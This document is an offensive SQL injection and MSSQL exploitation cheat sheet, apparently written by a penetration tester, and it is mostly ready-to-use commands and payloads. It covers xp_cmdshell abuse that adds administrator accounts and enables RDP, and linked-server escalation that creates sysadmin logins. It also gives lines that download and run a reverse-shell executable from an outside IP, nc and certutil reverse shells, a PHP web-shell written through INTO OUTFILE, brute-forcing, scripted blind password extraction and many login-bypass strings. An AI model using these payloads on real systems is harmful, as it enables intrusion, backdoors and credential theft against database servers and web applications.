Hello everyone, below is my cheat sheet for SQL injection. It is really a collection of the
SQL injection techniques that I use frequently, and it can give you a basic understanding of
how SQL injection is performed.
THIS IS CREATED MERELY FOR EDUCATIONAL & ETHICAL PURPOSES ONLY. THE AUTHOR IS
NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS.
SQLServer Abuse with nmap
#MSSQL Script Scanning using Nmap
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
#MYSQL Script Scanning using Nmap
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.10.10.10 -p 3306
#Running ms-sql-info via NMAP
nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS
#Running ms-sql-xp-cmdshell & Executing Commands via NMAP
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add"
DB Ports
• MSSQL: 1433, 1434
• Oracle: 1521, 1630
• DB2: 50000, 50001
• SAP: 3200, 3300
• Postgres: 5432
• MariaDB, MySQL: 3306
• Informix: 9088, 9089
• ICS Protocols: 502 (Modbus), 20000 (DNP3), 44818 (EtherNet/IP)
MSSQL/MYSQL DB Login Bruteforce
git clone https://github.com/m8r0wn/enumdb.git
cd enumdb
python3 setup.py install
Download Wordlist from Seclists
cat mssql-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt
#Port is optional
#-t = mysql or mssql; mssql port 1433/1434; mysql port - 3309
# -U = users.txt, -u = username; -P = passwords.txt, -p = password
enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v
SQSH usage:
sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'
\go
EXEC xp_cmdshell 'net localgroup administrators bhanu /add'
\go
MssqlClient
Exploiting From Windows with Explanation - Nikhil Mittal
#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)
mssqlclient.py username@10.10.10.10
#Run arbitrary commands
xp_cmdshell whoami
#View Version
SELECT @@version
#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();
#List Users
SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';
#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
#List all stored procedures
SELECT * FROM sys.procedures
SELECT * FROM [master].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = 'PROCEDURE' AND LEFT(ROUTINE_NAME, 3) NOT IN ('sp_', 'xp_', 'ms_')
SELECT NAME FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''
#stored procedures and assembly modules
select * from [hostname\DB_NAME].Table_Name.sys.assembly_modules
#Enum Privs
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
#Show Servername
select @@servername
#Show linked servers
select * from sysservers;
select name from sysservers;
#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find Stored Procedures on a linked server
EXECUTE(' SELECT * FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''') at [hostname\DB_NAME];
EXECUTE(' SELECT NAME FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''') at [hostname\DB_NAME];
#Check whether CLR is enabled on the server; if the output shows CLR enabled, it is exploitable
select * from [hostname\DB_NAME].clients.sys.configurations where name like '%clr%enabled'
#Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
#Check sysadmin accounts on the server/DB
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];
#Running command as a linked server using the server that we have permissions on
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#View the permissions you have on the linked database.
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as another user multiple times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
#Login as a new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123
#List Databases
SELECT name FROM master..sysdatabases;
#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]
select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;
#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
#Abusing Xpdirtree
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
Enum Linked SQL Servers #Show linked servers select * from sysservers; select name from sysservers; #Enum Linked Remote Servers EXECUTE ('select @@servername;') at [hostname\DB_NAME]; EXECUTE ('select suser_name();') at [hostname\DB_NAME]; EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME]; EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME]; #Find the username from which we can run commands on the server EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG]; when Execute doesnt work try openquery as below #List Databases in [hostname\DB_NAME] select * from openquery([hostname\DB_NAME],'select * from sys.databases')
#List Tables in clients db select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].sys.tables')
#Fetch table data select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].dbo.COL_NAME') #find a string in a column select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].dbo.COL_NAME') where name like '%noob%'
Enum from Windows #If xp_cmdshell is disabled: Get-SQLQuery -query "EXECUTE(sp_configure 'show advanced options',1;reconfigure;)" -Verbose Get-SQLQuery -Query "EXECUTE( sp_configure 'xp_cmdshell', 1; RECONFIGURE;)" -Verbose SQLCMD -S hostname\SQLSer -Q "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" -U Admin -P Admin #cmd Execution Get-SQLQuery -Query "EXECUTE(xp_cmdshell 'whoami')" SQLCMD -Q "EXEC xp_cmdshell 'whoami'" #Enable xp_cmdshell on a linked server and execute commands Get-SQLQuery -query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "server02.steins.local"'" Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''whoami'''''') AT "server02.steins.local"' #Get Reverse Shell on a Linked Server Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''dir c:\temp'''''') AT "server.steins.local"' Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c powershell.exe Import-Module Microsoft.PowerShell.Utility;Invoke-WebRequest http://10.10.10.10/mal.exe -OutFile c:\temp\mal.exe"'') AT "server.steins.local"' Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c powershell.exe Invoke-WebRequest http://10.10.10.10/mal.exe -OutFile c:\temp\mal.exe"'') AT "server.steins.local"' #mal.exe is C# reverse shell Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c c:\temp\mal.exe"'') AT "server.steins.local"' nc -nvlp 8080
PowerUPSQL Commands #Find the SQL Instances using PowerUpSQL based on the SPN Get-SQLInstanceDomain #Get Local DB Info Get-SQLInstanceLocal #Find a machine that is acecssible Get-SQLInstanceLocal Get-SQLInstanceDomain | Get-SQLInstanceTestThreaded | Format-List #Dump all the DB Info into csv files, get the instance name from Invoke-SQLDumpInfo -Verbose -Instance "Hostname\SQLInstance" #Start SQLAudit - lists out all vulnerabilities Invoke-SQLAudit -Verbose -Instance "Hostname\SQLInstance" #Start Piv Esc on the server Invoke-SQLEscalatePriv –Verbose –Instance "Hostname\SQLInstance" #List Linked Servers Get-SQLServerLinkCrawl -Instance Hostname\SQLInstance #Scan sql servers using UDP Get-SQLInstanceScanUDP #get the list of comuter names comps = (Get-SQLInstanceDomain).Computername #Check if the current domain user has access to a database: Get-SQLInstanceDomain | GetSQLConnectionTestThreaded -Verbose #View the info the SQL Server Get-SQLInstanceDomain | Get-SQLServerInfo #get the databases and the users info Get-SQLFuzzServerLogin -Instance Sql_Serve1 –Verbose #automated DB link crawling. Get-SQLServerLinkCrawl -Instance SQL_Server1
Bruteforcing SQL Server
Invoke-BruteForce from Nishang
$comps | Invoke-BruteForce -UserList users.txt -PasswordList passwords.txt -Service SQL -Verbose
or
Invoke-BruteForce -ComputerName Sql_Server1 -UserList users.txt -PasswordList passwords.txt -Service SQL -Verbose
#bruteforcing using PowerUPSQL
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -
Username sa -Password Password -Verbose
#Login into the database as a logged in user
runas /noprofile /netonly /user:<domain\username> powershell.exe
SQL Server - Privilege Escalation
Version - SELECT @@version
Current User - SELECT SUSER_SNAME(), SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin') Current Role – SELECT user
Current database - SELECT db_name()
List all databases - SELECT name FROM master..sysdatabases
#All logins on server
SELECT * FROM sys.server_principals WHERE type_desc != 'SERVER_ROLE'
#All database users for a database
SELECT * FROM sys.database_principals WHERE type_desc != 'DATABASE_ROLE'
#List all sysadmin (More info with high priv user)
SELECT name,type_desc,is_disabled FROM
sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
#List all database roles
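-- Run this in a user (non-default) database, i.e. not the master database.
-- The original note used "//", which is not a T-SQL comment marker and makes
-- the line fail when pasted as-is.
USE accessdb;

-- List every database role together with its members. Roles without any
-- member are kept in the output and reported as 'No members', which makes
-- this a quick way to review who holds which role in the current database.
SELECT
    DP1.name AS DatabaseRoleName,
    ISNULL(DP2.name, 'No members') AS DatabaseUserName
FROM sys.database_principals AS DP1
-- Start from the roles and LEFT JOIN the memberships: same rows as the
-- original RIGHT OUTER JOIN, but the preserved table reads first.
LEFT JOIN sys.database_role_members AS DRM
    ON DRM.role_principal_id = DP1.principal_id
LEFT JOIN sys.database_principals AS DP2
    ON DRM.member_principal_id = DP2.principal_id
WHERE DP1.type = 'R'  -- 'R' = database role
ORDER BY DP1.name;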
Effective Permissions for the server - SELECT * FROM fn_my_permissions(NULL, 'SERVER');
Effective Permissions for the database - SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
Active user token – SELECT * FROM sys.user_token
Active login token - SELECT * FROM sys.login_token
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1' /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
/This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
/union all is used to combine 2 or more select statements
/Where ever output is displayed - it is suitable to enumerate, here 5
website.com/comment.php?id=738 union select 1,2,3,4,@@version,6 /mysql version command
website.com/comment.php?id=738 union select 1,2,3,4,user(),6 /Current user
website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
/Prints all of the table names in the database
website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
/Extract column names from Table - Ue
website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users
ERROR BASED SQL Injection: SQLite
==================================
http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;
http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;
search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--; # Get all table names in sqlite_master db
search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--; #Get usernames and passwords
Error Based SQL Injection using SQLMAP
sqlmap -u "http://website.com/index.php?debug" --string="This user exists" --auth-type=Basic --auth-cred=username:password --data "username=user2" --level=5 --risk=3
Automating Blind SQL Injection Example: import requests from requests.auth import HTTPBasicAuth chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' filtered = '' passwd = '' for char in chars: Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'} r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data) if 'exists' in r.text : filtered = filtered + char for i in range(0,32): for char in filtered: Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'} r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data) if 'exists' in r.text : passwd = passwd + char print(passwd) break
Code by Abatchy's blog SQL Injection sample code import requests url='http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php' passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890' bstr='This user exist'.encode('utf-8') password='' for i in range(32): for j in passchar: req = requests.get(url+'?username=natas16" AND password LIKE BINARY "' + password + j + '%" "') if req.content.find(bstr) != -1: password += j print('Password: ' + password) break Code by AnonHack.in
TIME BASED SQL INJECTION:
--------------------------
In time-based SQL injection, if the injected condition is true the response is delayed by the
sleep time; otherwise the query is executed immediately.
website.com/comment.php?id=738-sleep(5) /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Executes after 5 seconds -Because the statement is true
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Executes Immediately - Statement is false
website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
/Loading a file from the server
website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'
website.com/backdoor.php/cmd?ipconfig
Automating Time-Based SQL Injection Example:
import requests
from requests.auth import HTTPBasicAuth
Auth=HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
headers = {'content-type': 'application/x-www-form-urlencoded'}
filteredchars = ''
passwd = ''
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
# SELECT * from users where username="_natas18" and password like binary '%a%' and sleep(5) #
#password for natas18 does contain the letter ‘a’ and sleep(5) was executed. if the pass has letter 'a' it takes 5 secs to load
for char in allchars:
payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char)
r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
filteredchars = filteredchars + char
print(filteredchars)
print(filteredchars)
for i in range(0,32):
for char in filteredchars:
payload = 'username=natas18%22%20and%20password%20like%20binary%20\'{0}%25\'%20and%20sleep(1)%23'.format(passwd + char)
r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
passwd = passwd + char
print(passwd)
break
Code written by Abatchy's blog
SQL Command Injection: MSSQL
bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--
admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--
admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe
sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password
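If xp_cmdshell is disabled:
(Changing this option requires the ALTER SETTINGS server permission, and SQL Server writes the configuration change to its error log, so an unexpected change from 0 to 1 is worth alerting on.)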
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Creating an Admin Account with RDP Access:
aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--
aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--
aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---
NSE Script for XP_CMDSHELL
Bypassing Restriction Interfaces:
----------------------------------
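Use the Tamper Data Firefox plugin. /Intercepts POST requests
Start Tamper Data --> type something into an input field, or change the items in a
drop-down. Restrictions enforced only in the browser can be changed this way, so the server has to validate every submitted value itself.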
SQLMAP:
---------
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5
/Dump All DB data
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell
sqlmap --help
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
List all the databases:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--dbs
Current User:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--current-user
Current DB:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--current-db
Tables:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--tables -D owasp10
Columns:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--columns -T accounts -D owasp10
Dump:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
-T accounts -D owasp10 --dump
OS Shell:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--os-shell
SQL Shell:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--sql-shell
current_user()
user()
database()
select tablename from information_schema.table where table_schema = 'owasp10'
Methodology
1) Check for login pages - try all special characters
2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that
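Cheatsheet (these strings only have an effect where the application concatenates input into the SQL statement; with parameterized queries they are treated as plain data)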
admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--
USERNAME: ' or 1/*
PASSWORD: */ =1 --
USERNAME: admin' or 'a'='a
PASSWORD '#
If the database is mysql, try to dump all login info to files?
Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--
union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055